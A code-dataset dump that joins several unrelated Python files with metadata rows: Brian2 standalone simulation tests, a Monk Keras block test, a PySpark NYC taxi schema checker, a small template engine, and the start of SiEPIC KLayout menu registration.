tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True, run=True, with_output=True)
assert_allclose(G.v[:], v)
assert_allclose(S.v_syn[:], v)
assert_allclose(G.x[:], x)
assert_allclose(S.x_syn[:], x)
assert_allclose(G.n[:], n)
assert_allclose(S.n_syn[:], n)
assert_allclose(G.b[:], b)
assert_allclose(S.b_syn[:], b)
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_consistency(with_output=False):
previous_device = get_device()
n_cells = 100
n_recorded = 10
numpy.random.seed(42)
taum = 20 * ms
taus = 5 * ms
Vt = -50 * mV
Vr = -60 * mV
El = -49 * mV
fac = (60 * 0.27 / 10)
gmax = 20*fac
dApre = .01
taupre = 20 * ms
taupost = taupre
dApost = -dApre * taupre / taupost * 1.05
dApost *= 0.1*gmax
dApre *= 0.1*gmax
connectivity = numpy.random.randn(n_cells, n_cells)
sources = numpy.random.random_integers(0, n_cells-1, 10*n_cells)
times = numpy.random.choice(numpy.arange(10*n_cells), 10*n_cells,
replace=False)*ms
v_init = Vr + numpy.random.rand(n_cells) * (Vt - Vr)
eqs = Equations('''
dv/dt = (g-(v-El))/taum : volt
dg/dt = -g/taus : volt
''')
results = {}
for (n_threads, devicename) in [(0, 'runtime'),
(0, 'cpp_standalone'),
(1, 'cpp_standalone'),
(2, 'cpp_standalone'),
(3, 'cpp_standalone'),
(4, 'cpp_standalone')]:
set_device(devicename, build_on_run=False, with_output=False)
Synapses.__instances__().clear()
if devicename=='cpp_standalone':
reinit_devices()
prefs.devices.cpp_standalone.openmp_threads = n_threads
P = NeuronGroup(n_cells, model=eqs, threshold='v>Vt', reset='v=Vr', refractory=5 * ms)
Q = SpikeGeneratorGroup(n_cells, sources, times)
P.v = v_init
P.g = 0 * mV
S = Synapses(P, P,
model = '''dApre/dt=-Apre/taupre : 1 (event-driven)
dApost/dt=-Apost/taupost : 1 (event-driven)
w : 1''',
pre = '''g += w*mV
Apre += dApre
w = w + Apost''',
post = '''Apost += dApost
w = w + Apre''')
S.connect()
S.w = fac*connectivity.flatten()
T = Synapses(Q, P, model = "w : 1", on_pre="g += w*mV")
T.connect(j='i')
T.w = 10*fac
spike_mon = SpikeMonitor(P)
rate_mon = PopulationRateMonitor(P)
state_mon = StateMonitor(S, 'w', record=range(n_recorded), dt=0.1*second)
v_mon = StateMonitor(P, 'v', record=range(n_recorded))
run(0.2 * second, report='text')
if devicename=='cpp_standalone':
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
results[n_threads, devicename] = {}
results[n_threads, devicename]['w'] = state_mon.w
results[n_threads, devicename]['v'] = v_mon.v
results[n_threads, devicename]['s'] = spike_mon.num_spikes
results[n_threads, devicename]['r'] = rate_mon.rate[:]
for key1, key2 in [((0, 'runtime'), (0, 'cpp_standalone')),
((1, 'cpp_standalone'), (0, 'cpp_standalone')),
((2, 'cpp_standalone'), (0, 'cpp_standalone')),
((3, 'cpp_standalone'), (0, 'cpp_standalone')),
((4, 'cpp_standalone'), (0, 'cpp_standalone'))
]:
assert_allclose(results[key1]['w'], results[key2]['w'])
assert_allclose(results[key1]['v'], results[key2]['v'])
assert_allclose(results[key1]['r'], results[key2]['r'])
assert_allclose(results[key1]['s'], results[key2]['s'])
reset_device(previous_device)
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_timedarray(with_output=True):
set_device('cpp_standalone', build_on_run=False)
defaultclock.dt = 0.1*ms
ta1d = TimedArray(np.arange(10)*volt, dt=1*ms)
ta2d = TimedArray(np.arange(300).reshape(3, 100).T, dt=defaultclock.dt)
G = NeuronGroup(4, '''x = ta1d(t) : volt
y = ta2d(t, i) : 1''')
mon = StateMonitor(G, ['x', 'y'], record=True)
run(11*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, compile=True,
run=True, with_output=with_output)
for idx in xrange(4):
assert_equal(mon[idx].x[:],
np.clip(np.arange(11).repeat(10), 0, 9)*volt)
for idx in xrange(3):
assert_equal(mon[idx].y[:],
np.clip(np.arange(110), 0, 99) + idx*100)
assert_equal(mon[3].y[:], np.nan)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_duplicate_names_across_nets(with_output=True):
set_device('cpp_standalone', build_on_run=False)
obj1 = BrianObject(name='name1')
obj2 = BrianObject(name='name2')
obj3 = BrianObject(name='name3')
obj4 = BrianObject(name='name1')
net1 = Network(obj1, obj2)
net2 = Network(obj3, obj4)
net1.run(0*ms)
net2.run(0*ms)
assert_raises(ValueError, lambda: device.build())
reset_device()
@attr('cpp_standalone', 'standalone-only', 'openmp')
@with_setup(teardown=reinit_devices)
def test_openmp_scalar_writes(with_output=False):
set_device('cpp_standalone', build_on_run=False)
prefs.devices.cpp_standalone.openmp_threads = 4
G = NeuronGroup(10, 's : 1 (shared)')
G.run_regularly('s += 1')
run(defaultclock.dt)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert_equal(G.s[:], 1.0)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_time_after_run(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, 'dv/dt = -v/(10*ms) : 1')
net = Network(G)
assert_allclose(defaultclock.dt, 0.1*ms)
assert_allclose(defaultclock.t, 0.*ms)
assert_allclose(G.t, 0.*ms)
assert_allclose(net.t, 0.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 10.*ms)
assert_allclose(G.t, 10.*ms)
assert_allclose(net.t, 10.*ms)
net.run(10*ms)
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert_allclose(defaultclock.t, 20.*ms)
assert_allclose(G.t, 20.*ms)
assert_allclose(net.t, 20.*ms)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_array_cache(with_output=False):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(10, '''dv/dt = -v / (10*ms) : 1
w : 1
x : 1
y : 1
z : 1 (shared)''',
threshold='v>1')
S = Synapses(G, G, 'weight: 1', on_pre='w += weight')
S.connect(p=0.2)
S.weight = 7
assert_allclose(G.v, 0)
assert_allclose(G.w, 0)
assert_allclose(G.x, 0)
assert_allclose(G.y, 0)
assert_allclose(G.z, 0)
assert_allclose(G.i, np.arange(10))
assert_raises(NotImplementedError, lambda: S.weight[:])
# Setting variables with explicit values should not change anything
G.v = np.arange(10)+1
G.w = 2
G.y = 5
G.z = 7
assert_allclose(G.v, np.arange(10)+1)
assert_allclose(G.w, 2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# But setting with code should invalidate them
G.x = 'i*2'
assert_raises(NotImplementedError, lambda: G.x[:])
# Make sure that the array cache does not allow to use incorrectly sized
# values to pass
assert_raises(ValueError, lambda: setattr(G, 'w', [0, 2]))
assert_raises(ValueError, lambda: G.w.__setitem__(slice(0, 4), [0, 2]))
run(10*ms)
# v is now no longer known without running the network
assert_raises(NotImplementedError, lambda: G.v[:])
# Neither is w, it is updated in the synapse
assert_raises(NotImplementedError, lambda: G.w[:])
# However, no code touches y or z
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
# i is read-only anyway
assert_allclose(G.i, np.arange(10))
# After actually running the network, everything should be accessible
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir, run=True, compile=True,
with_output=with_output)
assert all(G.v > 0)
assert all(G.w > 0)
assert_allclose(G.x, np.arange(10)*2)
assert_allclose(G.y, 5)
assert_allclose(G.z, 7)
assert_allclose(G.i, np.arange(10))
assert_allclose(S.weight, 7)
reset_device()
@attr('cpp_standalone', 'standalone-only')
@with_setup(teardown=reinit_devices)
def test_active_flag_standalone(with_output=True):
set_device('cpp_standalone', build_on_run=False)
G = NeuronGroup(1, 'dv/dt = 1/ms : 1')
mon = StateMonitor(G, 'v', record=0)
mon.active = False
run(1*ms)
mon.active = True
G.active = False
run(1*ms)
tempdir = tempfile.mkdtemp()
if with_output:
print tempdir
device.build(directory=tempdir)
# Monitor should start recording at 1ms
# Neurongroup should not integrate after 1ms (but should have integrated before)
assert_allclose(mon[0].t[0], 1*ms)
assert_allclose(mon[0].v, 1.0)
if __name__=='__main__':
# Print the debug output when testing this file only but not when running
# via nose test
for t in [
test_cpp_standalone,
test_dt_changes_between_runs_standalone,
test_multiple_connects,
test_storing_loading,
test_openmp_consistency,
test_timedarray,
test_duplicate_names_across_nets,
test_openmp_scalar_writes,
test_time_after_run,
test_array_cache,
test_active_flag_standalone
]:
t(with_output=True)
reinit_devices()
| false | true |
f7234e4d5b6767c9851cbf514a946c133a149a00 | 1,511 | py | Python | monk/system_unit_tests/keras/test_block_squeezenet_fire.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 542 | 2019-11-10T12:09:31.000Z | 2022-03-28T11:39:07.000Z | monk/system_unit_tests/keras/test_block_squeezenet_fire.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 117 | 2019-11-12T09:39:24.000Z | 2022-03-12T00:20:41.000Z | monk/system_unit_tests/keras/test_block_squeezenet_fire.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 246 | 2019-11-09T21:53:24.000Z | 2022-03-29T00:57:07.000Z | import os
import sys
sys.path.append("../../../../monk_v1/");
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
import tensorflow as tf
if(tf.__version__[0] == '2'):
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
def test_block_squeezenet_fire(system_dict):
forward = True;
test = "test_block_squeezenet_fire";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
gtf = prototype(verbose=0);
gtf.Prototype("sample-project-1", "sample-experiment-1");
network = [];
network.append(gtf.squeezenet_fire_block(squeeze_channels=16, expand_channels_1x1=32, expand_channels_3x3=64));
gtf.Compile_Network(network, data_shape=(1, 64, 64), use_gpu=False);
x = tf.placeholder(tf.float32, shape=(1, 64, 64, 1))
y = gtf.system_dict["local"]["model"](x);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
| 29.627451 | 123 | 0.643283 | import os
import sys
sys.path.append("../../../../monk_v1/");
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
import tensorflow as tf
if(tf.__version__[0] == '2'):
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import numpy as np
def test_block_squeezenet_fire(system_dict):
forward = True;
test = "test_block_squeezenet_fire";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
gtf = prototype(verbose=0);
gtf.Prototype("sample-project-1", "sample-experiment-1");
network = [];
network.append(gtf.squeezenet_fire_block(squeeze_channels=16, expand_channels_1x1=32, expand_channels_3x3=64));
gtf.Compile_Network(network, data_shape=(1, 64, 64), use_gpu=False);
x = tf.placeholder(tf.float32, shape=(1, 64, 64, 1))
y = gtf.system_dict["local"]["model"](x);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
| true | true |
f7234f9a4fd191667252060f448ed976d9a2af05 | 681 | py | Python | src/config/ref/check_tlc_schemas.py | josh-lang/where-cycle | f5574040cbffa38f4ae78540712882cfdb32c036 | [
"MIT"
] | 21 | 2020-07-01T16:51:47.000Z | 2020-08-06T06:21:29.000Z | src/config/ref/check_tlc_schemas.py | josh-lang/where-cycle | f5574040cbffa38f4ae78540712882cfdb32c036 | [
"MIT"
] | 2 | 2021-09-08T21:24:49.000Z | 2022-03-01T23:10:39.000Z | src/config/ref/check_tlc_schemas.py | josh-lang/where-cycle | f5574040cbffa38f4ae78540712882cfdb32c036 | [
"MIT"
] | 2 | 2020-07-01T18:10:52.000Z | 2020-07-01T20:06:35.000Z | import boto3
from pyspark.sql import SparkSession
s3 = boto3.resource('s3')
nyc_tlc = s3.Bucket('nyc-tlc')
spark = SparkSession.builder \
.appName('check_tlc_schemas') \
.getOrCreate()
for obj in nyc_tlc.objects.all():
key = obj.key
if key.startswith('trip data/') and key.endswith('.csv'):
path = 's3a://nyc-tlc/' + key
csv_df = spark.read.csv(
path = path,
header = True,
inferSchema = True,
enforceSchema = False,
ignoreLeadingWhiteSpace = True,
ignoreTrailingWhiteSpace = True,
samplingRatio = 0.1
)
print(path)
csv_df.printSchema()
| 25.222222 | 61 | 0.580029 | import boto3
from pyspark.sql import SparkSession
s3 = boto3.resource('s3')
nyc_tlc = s3.Bucket('nyc-tlc')
spark = SparkSession.builder \
.appName('check_tlc_schemas') \
.getOrCreate()
for obj in nyc_tlc.objects.all():
key = obj.key
if key.startswith('trip data/') and key.endswith('.csv'):
path = 's3a://nyc-tlc/' + key
csv_df = spark.read.csv(
path = path,
header = True,
inferSchema = True,
enforceSchema = False,
ignoreLeadingWhiteSpace = True,
ignoreTrailingWhiteSpace = True,
samplingRatio = 0.1
)
print(path)
csv_df.printSchema()
| true | true |
f723514c3ad26915fdb8e82e0db180b70ebd784e | 11,438 | py | Python | eveil/template.py | pjfichet/eveil | dfe0c340ac09050768f0b13024ddfec5ef2015b1 | [
"0BSD"
] | null | null | null | eveil/template.py | pjfichet/eveil | dfe0c340ac09050768f0b13024ddfec5ef2015b1 | [
"0BSD"
] | null | null | null | eveil/template.py | pjfichet/eveil | dfe0c340ac09050768f0b13024ddfec5ef2015b1 | [
"0BSD"
] | null | null | null | """A simple Python template renderer, for a nano-subset of Django syntax."""
# Comes from http://aosabook.org/en/500L/a-template-engine.html
# By Ned Batchelder (nedbatchelder.com)
# Hosted on https://github.com/aosabook/500lines/tree/master/template-engine/code
# Coincidentally named the same as http://code.activestate.com/recipes/496702/
# Modified by Pierre-Jean Fichet to suport more tests.
# And renamed template, class Template, etc., for convenience.
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import re
class TemplateSyntaxError(ValueError):
"""Raised when a template has a syntax error."""
pass
class CodeBuilder(object):
"""Build source code conveniently."""
def __init__(self, indent=0):
self.code = []
self.indent_level = indent
def __str__(self):
return "".join(str(c) for c in self.code)
def add_line(self, line):
"""Add a line of source to the code.
Indentation and newline will be added for you, don't provide them.
"""
self.code.extend([" " * self.indent_level, line, "\n"])
def add_section(self):
"""Add a section, a sub-CodeBuilder."""
section = CodeBuilder(self.indent_level)
self.code.append(section)
return section
INDENT_STEP = 4 # PEP8 says so!
def indent(self):
"""Increase the current indent for following lines."""
self.indent_level += self.INDENT_STEP
def dedent(self):
"""Decrease the current indent for following lines."""
self.indent_level -= self.INDENT_STEP
def get_globals(self):
"""Execute the code, and return a dict of globals it defines."""
# A check that the caller really finished all the blocks they started.
assert self.indent_level == 0
# Get the Python source as a single string.
python_source = str(self)
# Execute the source, defining globals, and return them.
global_namespace = {}
exec(python_source, global_namespace)
return global_namespace
class Template(object):
"""A simple template renderer, for a nano-subset of Django syntax.
Supported constructs are extended variable access::
{{var.modifer.modifier|filter|filter}}
loops::
{% for var in list %}...{% endfor %}
and ifs::
{% if var %}...{% endif %}
Comments are within curly-hash markers::
{# This will be ignored #}
Construct a Template with the template text, then use `render` against a
dictionary context to create a finished string::
template = Template('''
<h1>Hello {{name|upper}}!</h1>
{% for topic in topics %}
<p>You are interested in {{topic}}.</p>
{% endif %}
''',
{'upper': str.upper},
)
text = template.render({
'name': "Ned",
'topics': ['Python', 'Geometry', 'Juggling'],
})
"""
def __init__(self, text, *contexts):
"""Construct a Template with the given `text`.
`contexts` are dictionaries of values to use for future renderings.
These are good for filters and global values.
"""
self.context = {}
for context in contexts:
self.context.update(context)
self.all_vars = set()
self.loop_vars = set()
# We construct a function in source form, then compile it and hold onto
# it, and execute it to render the template.
code = CodeBuilder()
code.add_line("def render_function(context, do_dots):")
code.indent()
vars_code = code.add_section()
code.add_line("result = []")
code.add_line("append_result = result.append")
code.add_line("extend_result = result.extend")
code.add_line("to_str = str")
buffered = []
def flush_output():
"""Force `buffered` to the code builder."""
if len(buffered) == 1:
code.add_line("append_result(%s)" % buffered[0])
elif len(buffered) > 1:
code.add_line("extend_result([%s])" % ", ".join(buffered))
del buffered[:]
ops_stack = []
# Split the text to form a list of tokens.
tokens = re.split(r"(?s)({{.*?}}|{%.*?%}|{#.*?#})", text)
for token in tokens:
if token.startswith('{#'):
# Comment: ignore it and move on.
continue
elif token.startswith('{{'):
# An expression to evaluate.
expr = self._expr_code(token[2:-2].strip())
buffered.append("to_str(%s)" % expr)
elif token.startswith('{%'):
# Action tag: split into words and parse further.
flush_output()
words = token[2:-2].strip().split()
if words[0] == 'if':
# An if statement: evaluate the expression to determine if.
if len(words) != 2 and len(words) != 4:
self._syntax_error("Don't understand if", token)
ops_stack.append('if')
code.add_line(self._test_code(words))
code.indent()
elif words[0] == 'elif':
# An elif statement: evaluate the expression to determine if.
if len(words) != 2 and len(words) != 4:
self._syntax_error("Don't understand elif", token)
code.dedent()
code.add_line(self._test_code(words))
code.indent()
elif words[0] == 'else':
# An else statement: evalute the expression to determine it.
if len(words) != 1:
self._syntax_error("Don't understand else", token)
code.dedent()
code.add_line("else:")
code.indent()
elif words[0] == 'for':
# A loop: iterate over expression result.
if len(words) != 4 or words[2] != 'in':
self._syntax_error("Don't understand for", token)
ops_stack.append('for')
self._variable(words[1], self.loop_vars)
code.add_line(
"for c_%s in %s:" % (
words[1],
self._expr_code(words[3])
)
)
code.indent()
elif words[0].startswith('end'):
# Endsomething. Pop the ops stack.
if len(words) != 1:
self._syntax_error("Don't understand end", token)
end_what = words[0][3:]
if not ops_stack:
self._syntax_error("Too many ends", token)
start_what = ops_stack.pop()
if start_what != end_what:
self._syntax_error("Mismatched end tag", end_what)
code.dedent()
else:
self._syntax_error("Don't understand tag", words[0])
else:
# Literal content. If it isn't empty, output it.
if token:
#spaces = re.compile('\s+')
#spaces.sub(' ', token)
buffered.append(repr(token))
if ops_stack:
self._syntax_error("Unmatched action tag", ops_stack[-1])
flush_output()
for var_name in self.all_vars - self.loop_vars:
vars_code.add_line("c_%s = context[%r]" % (var_name, var_name))
code.add_line("return ''.join(result)")
code.dedent()
self._render_function = code.get_globals()['render_function']
def _test_code(self, words):
if len(words) == 2:
code = "{} {}:".format(words[0], self._expr_code(words[1]))
if len(words) == 4:
expr1 = words[1]
expr2 = words[3]
if words[1][0] != '"' and words[1][0] != "'" and not words[1].isdigit():
expr1 = self._expr_code(words[1])
if words[3][0] != '"' and words[3][0] != "'" and not words[3].isdigit():
expr2 = self._expr_code(words[3])
code = "{} {} {} {}:".format(words[0], expr1, words[2], expr2)
return code
def _expr_code(self, expr):
"""Generate a Python expression for `expr`."""
if "|" in expr:
pipes = expr.split("|")
code = self._expr_code(pipes[0])
for func in pipes[1:]:
self._variable(func, self.all_vars)
code = "c_%s(%s)" % (func, code)
elif "." in expr:
dots = expr.split(".")
code = self._expr_code(dots[0])
args = ", ".join(repr(d) for d in dots[1:])
code = "do_dots(%s, %s)" % (code, args)
else:
self._variable(expr, self.all_vars)
code = "c_%s" % expr
return code
def _syntax_error(self, msg, thing):
"""Raise a syntax error using `msg`, and showing `thing`."""
raise TemplateSyntaxError("%s: %r" % (msg, thing))
def _variable(self, name, vars_set):
"""Track that `name` is used as a variable.
Adds the name to `vars_set`, a set of variable names.
Raises an syntax error if `name` is not a valid name.
"""
if not re.match(r"[_a-zA-Z][_a-zA-Z0-9]*$", name):
self._syntax_error("Not a valid name", name)
vars_set.add(name)
def render(self, context=None):
"""Render this template by applying it to `context`.
`context` is a dictionary of values to use in this rendering.
"""
# Make the complete context we'll use.
render_context = dict(self.context)
if context:
render_context.update(context)
return self._render_function(render_context, self._do_dots)
def _do_dots(self, value, *dots):
"""Evaluate dotted expressions at runtime."""
for dot in dots:
try:
value = getattr(value, dot)
except AttributeError:
value = value[dot]
if callable(value):
value = value()
return value
| 37.257329 | 84 | 0.550883 |
import re
class TemplateSyntaxError(ValueError):
pass
class CodeBuilder(object):
def __init__(self, indent=0):
self.code = []
self.indent_level = indent
def __str__(self):
return "".join(str(c) for c in self.code)
def add_line(self, line):
self.code.extend([" " * self.indent_level, line, "\n"])
def add_section(self):
section = CodeBuilder(self.indent_level)
self.code.append(section)
return section
INDENT_STEP = 4
def indent(self):
self.indent_level += self.INDENT_STEP
def dedent(self):
self.indent_level -= self.INDENT_STEP
def get_globals(self):
assert self.indent_level == 0
python_source = str(self)
global_namespace = {}
exec(python_source, global_namespace)
return global_namespace
class Template(object):
def __init__(self, text, *contexts):
self.context = {}
for context in contexts:
self.context.update(context)
self.all_vars = set()
self.loop_vars = set()
code = CodeBuilder()
code.add_line("def render_function(context, do_dots):")
code.indent()
vars_code = code.add_section()
code.add_line("result = []")
code.add_line("append_result = result.append")
code.add_line("extend_result = result.extend")
code.add_line("to_str = str")
buffered = []
def flush_output():
if len(buffered) == 1:
code.add_line("append_result(%s)" % buffered[0])
elif len(buffered) > 1:
code.add_line("extend_result([%s])" % ", ".join(buffered))
del buffered[:]
ops_stack = []
tokens = re.split(r"(?s)({{.*?}}|{%.*?%}|{#.*?#})", text)
for token in tokens:
if token.startswith('{#'):
continue
elif token.startswith('{{'):
expr = self._expr_code(token[2:-2].strip())
buffered.append("to_str(%s)" % expr)
elif token.startswith('{%'):
flush_output()
words = token[2:-2].strip().split()
if words[0] == 'if':
if len(words) != 2 and len(words) != 4:
self._syntax_error("Don't understand if", token)
ops_stack.append('if')
code.add_line(self._test_code(words))
code.indent()
elif words[0] == 'elif':
# An elif statement: evaluate the expression to determine if.
if len(words) != 2 and len(words) != 4:
self._syntax_error("Don't understand elif", token)
code.dedent()
code.add_line(self._test_code(words))
code.indent()
elif words[0] == 'else':
if len(words) != 1:
self._syntax_error("Don't understand else", token)
code.dedent()
code.add_line("else:")
code.indent()
elif words[0] == 'for':
# A loop: iterate over expression result.
if len(words) != 4 or words[2] != 'in':
self._syntax_error("Don't understand for", token)
ops_stack.append('for')
self._variable(words[1], self.loop_vars)
code.add_line(
"for c_%s in %s:" % (
words[1],
self._expr_code(words[3])
)
)
code.indent()
elif words[0].startswith('end'):
if len(words) != 1:
self._syntax_error("Don't understand end", token)
end_what = words[0][3:]
if not ops_stack:
self._syntax_error("Too many ends", token)
start_what = ops_stack.pop()
if start_what != end_what:
self._syntax_error("Mismatched end tag", end_what)
code.dedent()
else:
self._syntax_error("Don't understand tag", words[0])
else:
if token:
#spaces = re.compile('\s+')
#spaces.sub(' ', token)
buffered.append(repr(token))
if ops_stack:
self._syntax_error("Unmatched action tag", ops_stack[-1])
flush_output()
for var_name in self.all_vars - self.loop_vars:
vars_code.add_line("c_%s = context[%r]" % (var_name, var_name))
code.add_line("return ''.join(result)")
code.dedent()
self._render_function = code.get_globals()['render_function']
def _test_code(self, words):
if len(words) == 2:
code = "{} {}:".format(words[0], self._expr_code(words[1]))
if len(words) == 4:
expr1 = words[1]
expr2 = words[3]
if words[1][0] != '"' and words[1][0] != "'" and not words[1].isdigit():
expr1 = self._expr_code(words[1])
if words[3][0] != '"' and words[3][0] != "'" and not words[3].isdigit():
expr2 = self._expr_code(words[3])
code = "{} {} {} {}:".format(words[0], expr1, words[2], expr2)
return code
def _expr_code(self, expr):
if "|" in expr:
pipes = expr.split("|")
code = self._expr_code(pipes[0])
for func in pipes[1:]:
self._variable(func, self.all_vars)
code = "c_%s(%s)" % (func, code)
elif "." in expr:
dots = expr.split(".")
code = self._expr_code(dots[0])
args = ", ".join(repr(d) for d in dots[1:])
code = "do_dots(%s, %s)" % (code, args)
else:
self._variable(expr, self.all_vars)
code = "c_%s" % expr
return code
def _syntax_error(self, msg, thing):
raise TemplateSyntaxError("%s: %r" % (msg, thing))
def _variable(self, name, vars_set):
if not re.match(r"[_a-zA-Z][_a-zA-Z0-9]*$", name):
self._syntax_error("Not a valid name", name)
vars_set.add(name)
def render(self, context=None):
# Make the complete context we'll use.
render_context = dict(self.context)
if context:
render_context.update(context)
return self._render_function(render_context, self._do_dots)
def _do_dots(self, value, *dots):
for dot in dots:
try:
value = getattr(value, dot)
except AttributeError:
value = value[dot]
if callable(value):
value = value()
return value
| true | true |
f72351511f63b93866cb1821a8cb26e2db01b425 | 129 | py | Python | arknights/__init__.py | djkcyl/arknights | 63b72a4747ee6c59724d504a178c8685bf45ef67 | [
"MIT"
] | 5 | 2022-01-07T18:33:20.000Z | 2022-02-15T14:55:48.000Z | arknights/__init__.py | djkcyl/arknights | 63b72a4747ee6c59724d504a178c8685bf45ef67 | [
"MIT"
] | null | null | null | arknights/__init__.py | djkcyl/arknights | 63b72a4747ee6c59724d504a178c8685bf45ef67 | [
"MIT"
] | 1 | 2022-03-04T16:07:31.000Z | 2022-03-04T16:07:31.000Z | from .ak import Arknights # noqa: F401
from .cgi import AkCall # noqa: F401
from .exception import PostException # noqa: F401
| 32.25 | 50 | 0.744186 | from .ak import Arknights
from .cgi import AkCall
from .exception import PostException
| true | true |
f72351587dd352745ee8c22af559c72e61329e99 | 8,192 | py | Python | klayout_dot_config/python/SiEPIC/setup.py | SiEPIC-Kits/SiEPIC-Tools | 1f62c33021771a54507cf1d94bb3b2cc57419d8a | [
"MIT"
] | 1 | 2021-04-08T02:23:44.000Z | 2021-04-08T02:23:44.000Z | klayout_dot_config/python/SiEPIC/setup.py | SiEPIC-Kits/SiEPIC-Tools | 1f62c33021771a54507cf1d94bb3b2cc57419d8a | [
"MIT"
] | null | null | null | klayout_dot_config/python/SiEPIC/setup.py | SiEPIC-Kits/SiEPIC-Tools | 1f62c33021771a54507cf1d94bb3b2cc57419d8a | [
"MIT"
] | null | null | null | import pya
def registerMenuItems():
import os
from . import scripts, lumerical, install
import SiEPIC.__init__
global ACTIONS
count = 0
menu = pya.Application.instance().main_window().menu()
path = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"files", "INTERCONNECT_icon.png")
path_flv = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"files", "flv_icon.png")
path_test = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"files", "test_icon.png")
import sys
if int(sys.version[0]) > 2 and sys.platform == 'darwin':
extra = " Py3"
else:
extra = " Py2"
s1 = "siepic_menu"
if not(menu.is_menu(s1)):
menu.insert_menu("help_menu", s1, "SiEPIC %s" % SiEPIC.__init__.__version__ + extra)
s2 = "waveguides"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Waveguides")
s2 = "metal"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Metal")
s2 = "layout"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Layout")
s2 = "exlayout"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Example Layouts")
s2 = "verification"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Verification")
s2 = "simulation_circuits"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Simulation, Circuits")
s2 = "simulation_components"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Simulation, Components")
s2 = "measurements"
if not(menu.is_menu(s1 + "." + s2)):
menu.insert_menu(s1 + ".end", s2, "Measurement Data")
if not(menu.is_menu("@toolbar.cir_sim")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.end", "cir_sim", ACTIONS[count])
ACTIONS[count].title = "Circuit \nSimulation"
ACTIONS[count].on_triggered(lumerical.interconnect.circuit_simulation_toolbar)
ACTIONS[count].icon = path
count += 1
if not(menu.is_menu("@toolbar.verification")):
ACTIONS.append(pya.Action())
menu.insert_item("@toolbar.end", "verification", ACTIONS[count])
ACTIONS[count].title = "Functional\nVerification"
ACTIONS[count].on_triggered(scripts.layout_check)
ACTIONS[count].icon = path_flv
count += 1
if not(menu.is_menu("@toolbar.coordinates")):
ACTIONS.append(pya.Action())
